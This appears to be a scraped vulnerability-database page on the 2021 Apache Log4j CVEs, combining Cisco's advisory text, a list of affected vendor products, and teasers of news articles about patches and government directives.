Critical Vulnerabilities in Apache Log4j Java Logging Library On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints On December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and previous versions, was disclosed: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack On December 18, 2021, a vulnerability in the Apache Log4j component affecting versions 2.16 and previous versions was disclosed: CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation On December 28, 2021, a vulnerability in the Apache Log4j component affecting versions 2.17 and previous versions was disclosed: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration For a description of these vulnerabilities, see the Apache Log4j Security Vulnerabilities page. Cisco's Response to These Vulnerabilities Cisco assessed all products and services for impact from both CVE-2021-44228 and CVE-2021-45046. To help detect exploitation of these vulnerabilities, Cisco has released Snort rules at the following location: Talos Rules 2021-12-21 Product fixes that are listed in this advisory will address both CVE-2021-44228 and CVE-2021-45046 unless otherwise noted. Cisco has reviewed CVE-2021-45105 and CVE-2021-44832 and has determined that no Cisco products or cloud offerings are impacted by these vulnerabilities. Cisco's standard practice is to update integrated third-party software components to later versions as they become available. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
Vulnerable Product | Search on Vulmon | Subscribe to Product |
---|---|---|
apache log4j |
||
apache log4j 2.0 |
||
cvat computer vision annotation tool - |
||
intel audio development kit - |
||
intel datacenter manager - |
||
intel genomics kernel library - |
||
intel oneapi - |
||
intel secure device onboard - |
||
intel sensor solution firmware development kit - |
||
intel system debugger - |
||
intel system studio - |
||
siemens sppa-t3000 ses3000 firmware |
||
siemens captial |
||
siemens captial 2019.1 |
||
siemens comos |
||
siemens desigo cc advanced reports 4.0 |
||
siemens desigo cc advanced reports 4.1 |
||
siemens desigo cc advanced reports 4.2 |
||
siemens desigo cc advanced reports 5.0 |
||
siemens desigo cc advanced reports 5.1 |
||
siemens desigo cc info center 5.0 |
||
siemens desigo cc info center 5.1 |
||
siemens e-car operation center |
||
siemens energy engage 3.1 |
||
siemens energyip 8.5 |
||
siemens energyip 8.6 |
||
siemens energyip 8.7 |
||
siemens energyip 9.0 |
||
siemens energyip prepay 3.7 |
||
siemens energyip prepay 3.8 |
||
siemens gma-manager |
||
siemens head-end system universal device integration system |
||
siemens industrial edge management |
||
siemens industrial edge management hub |
||
siemens logo! soft comfort |
||
siemens mendix |
||
siemens mindsphere |
||
siemens navigator |
||
siemens nx |
||
siemens opcenter intelligence |
||
siemens operation scheduler |
||
siemens sentron powermanager 4.1 |
||
siemens sentron powermanager 4.2 |
||
siemens siguard dsa 4.2 |
||
siemens siguard dsa 4.3 |
||
siemens siguard dsa 4.4 |
||
siemens sipass integrated 2.80 |
||
siemens sipass integrated 2.85 |
||
siemens siveillance command |
||
siemens siveillance control pro |
||
siemens siveillance identity 1.5 |
||
siemens siveillance identity 1.6 |
||
siemens siveillance vantage |
||
siemens siveillance viewpoint |
||
siemens solid edge cam pro |
||
siemens solid edge harness design |
||
siemens solid edge harness design 2020 |
||
siemens spectrum power 4 |
||
siemens spectrum power 4 4.70 |
||
siemens spectrum power 7 |
||
siemens spectrum power 7 2.30 |
||
siemens teamcenter |
||
siemens tracealertserverplus |
||
siemens vesys |
||
siemens vesys 2019.1 |
||
siemens xpedition enterprise - |
||
siemens xpedition package integrator - |
||
debian debian linux 10.0 |
||
debian debian linux 11.0 |
||
sonicwall email security |
||
fedoraproject fedora 34 |
||
fedoraproject fedora 35 |
||
siemens 6bk1602-0aa12-0tp0 firmware |
||
siemens 6bk1602-0aa22-0tp0 firmware |
||
siemens 6bk1602-0aa32-0tp0 firmware |
||
siemens 6bk1602-0aa42-0tp0 firmware |
||
siemens 6bk1602-0aa52-0tp0 firmware |
Symantec data shows variation and scope of attacks.
Posted: 23 Dec, 20214 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinLog4j Vulnerabilities: Attack InsightsSymantec data shows variation and scope of attacks.Apache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...
IT threat evolution in Q3 2022 IT threat evolution in Q3 2022. Non-mobile statistics IT threat evolution in Q3 2022. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q3 2022: Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. Web Anti-Virus recognized 251,288,987...
Get our weekly newsletter Apply fixes responsibly in a timely manner or face the wrath of Lina Khan
The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else. In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late. The FTC is advising companies to consult the US Cy...
Get our weekly newsletter Third major fix in ten days is an infinite recursion flaw rated 7.5/10
The Apache Software Foundation (ASF) has revealed a third bug in its Log4 Java-based open-source logging library Log4j. CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j. That’s the third new version of the tool in the last ten days. In case you haven’t been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remote code execution f...
Get our weekly newsletter Federal agencies have a week to get their systems patched
The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021. Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released a wee...
Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...
Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...
Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs
The US government's Cybersecurity and Infrastructure Security Agency (CISA) is adding three more flaws to its list of known-exploited vulnerabilities, including one involving TP-Link routers that is being targeted by the operators of the notorious Mirai botnet. The other two placed on the list this week involve versions of Oracle's WebLogic Server software and the Apache Foundation's Log4j Java logging library. The command-injection flaw in TP-Link's Archer AX21 Wi-Fi 6 routers – tracked as CV...
Get our weekly newsletter Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad
In Brief Triton malware remains a threat to the global energy sector, according to an FBI warning. Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility. The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and control crit...